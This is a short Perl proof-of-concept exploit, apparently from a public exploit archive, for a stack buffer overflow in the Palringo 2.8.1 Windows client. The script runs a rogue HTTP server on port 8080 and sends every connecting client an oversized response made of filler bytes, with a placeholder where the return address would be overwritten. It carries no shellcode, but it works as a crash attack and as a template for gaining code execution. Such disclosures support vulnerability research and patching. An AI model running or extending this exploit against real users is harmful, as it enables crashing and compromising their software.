25 lines
No EOL
767 B
Perl
Executable file
25 lines
No EOL
767 B
Perl
Executable file
#!/use/bin/perl
|
||
# Exploit Title: palringo stack buffer overflow
|
||
# Date: 10 January 2015
|
||
# Vulnerability discovered by: Mr.ALmfL9
|
||
# Vendor Homepage: http://www.palringo.com/
|
||
# Software Link: http://www.palringo.com/ar/sa/download/?get=winpc
|
||
# Version: 2.8.1
|
||
# Tested on: Windows 8.1
|
||
use IO::Socket;
|
||
$port = 8080;
|
||
my $payload = "\x41" x 144;
|
||
$payload = $payload. "\x42" x 4 ;
|
||
$payload = $payload. "\x42" x 9000;
|
||
$serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n";
|
||
while($cli=$serv->accept()){
|
||
print "[#] port is: $port\n";
|
||
print $cli "HTTP/$payload\r\n\r\n";
|
||
while(<$cli>){
|
||
print $cli;
|
||
|
||
}
|
||
}
|
||
#*REFERENCE*
|
||
#.1=http://store2.up-00.com/2015-01/1420867197761.png
|
||
#.2=http://store2.up-00.com/2015-01/1420867235381.png |